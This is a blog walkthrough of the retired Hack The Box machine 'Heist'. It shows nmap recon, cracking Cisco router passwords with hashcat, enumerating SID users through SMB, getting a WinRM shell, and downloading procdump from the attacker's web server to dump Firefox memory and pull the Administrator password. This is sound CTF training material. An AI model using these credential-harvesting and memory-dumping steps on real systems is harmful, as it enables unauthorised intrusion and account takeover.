Hack The Box – Heist Writeup by Nikhil Sahoo
Introduction
Back with a new blog. Today we will go through the walkthrough of the Hack the Box machine Heist which retired very recently. It was given the easy level but I felt it was quite tricky and a bit difficult, the reason being that I’m completely a noob and always get scared when it comes to Windows exploitation. But we all need to start from somewhere so thought of giving this box a try. So without further ado let’s begin…
Recon
We’ll start with our recon by doing an Nmap scan.
nmap -sC -sV -p- 10.10.10.149
So port 80 is open. Let’s check that first in our browser
It’s a login portal. There’s an option below to login as a guest so let’s try that.
From the above picture, we can clearly see that there’s a chat session between a user Hazard and the support admin where the user Hazard has some issues with his cisco router and has attached the configurations for it and has also requested the admin to create an account for him… These chats are very important for our further steps 😉 .
Let’s download the attachment and try to analyze it.
Looks like it contains 2 cisco type 7 and 1 type 5 passwords… We can decyprt type 7 passwords using no of tools available online. I used the following link :
http://ibeast.com/tools/CiscoPassword
So here are the credentials we have collected till now:
rout3r: $uperP@ssword
admin: Q4)sJu\Y8qz*A3?d
But on using these credentials on the login portal we won’t be able to login successfully 🙁
We also have another cisco type 5 password and we will be using hashcat for cracking it.
So on typing in hashcat -h we can check the number associated with the hash type.
So let’s run hashcat by typing in:
hashcat -m 500 <your_hash_file> <password_list_file> –force –outfile output.txt
And we have cracked it successfully:
$1$pdQG$o8nrSzsGXeaduXrjlvKc91 : stealth1agent
But on trying this password in the login portal we still won’t be able to login 🙁
Let’s again check our Nmap scan. We can see that the 5895 port is open which is used by WinRm (Microsoft Windows Remote Management) which is basically a service/protocol used to manage remote systems.
So here’s an amazing ruby script that would give us a shell:
https://alionder.net/winrm-shell/
I tried with all possible usernames and passwords collected till now but again I got no success -_-
Anyway, after banging my head for quite long, I got a hint from the forum that we can enumerate more users by bruteforcing SIDs (Security Identifiers) through SMB.
We can use lookupsid.py from impacket to bruteforce more users. To know more about impacket follow this link here
Exploitation
And after a lot of combinations, this following pair finally worked “Hazard:stealth1agent” and it was able to bruteforce more users.
python lookupsid.py Hazard:stealth1agent@10.10.10.149
Let’s try all these users again for connecting to the machine via WinRM.
And the following pair seemed to work: “Chase:Q4)sJu\Y8qz*A3?d”
So let’s try to run the ruby file now…
And we should be getting our user flag.
Privilege Escalation
Now moving on for our root flag.
Let’s do a quick ps to check all the processes running.
So we see firefox instances running. We can check if any sensitive pieces of information are present in the memory/ram by taking a dump of the firefox process.
We can user Procdump.exe which could be downloaded from here:
https://docs.microsoft.com/en-us/sysinternals/downloads/procdump
After downloading the exe file we will place it in our web server (inside /var/www/html/) and run service apache2 start to start the webserver.
Now moving back to the shell we can download a file using Invoke-WebRequest command.
so type in the following command to download the exe file in the current directory:
Invoke-WebRequest -Uri http://webserver/procdump64.exe -OutFile proc.exe
We will be taking the dump of the firefox process next. There are around 4 firefox processes. We will take the dump of the one that has the highest CPU usage.
So type in the following to take the dump:
./proc.exe -ma <process_id>
This will create a dump. Now next is to analyze it. I actually wanted to transfer the dump to my machine but couldn’t find a way.
But we could still analyze it to search for sensitive pieces of information from our WinRM shell itself.
On running, cat over that dump will give us a hell lot of information so what we can do is we can grep some important strings like username or password.
cat firefox.exe_191130_175757.dmp | Select-String “username=”
Here Select-String in PowerShell is basically equivalent to grep in Linux.
We can use the creds above to login via WinRM again using the same script used before. Just change the username to Administrator and password to the string that we got from the dump(shown in the picture above).
All set, let’s run the ruby script and we should be getting our root flag.
And that’s the end of the box.
So that’s for now. See you next time. Goodbye
You can have a look at my previous article on A tale of an S3 Bucket Misconfiguration. Here is the link of the article
Loved what you read?
If so, then kindly comment, follow and share our website for much more interesting stuff
For any queries you can send a Hi to my Linkedin Handle: Here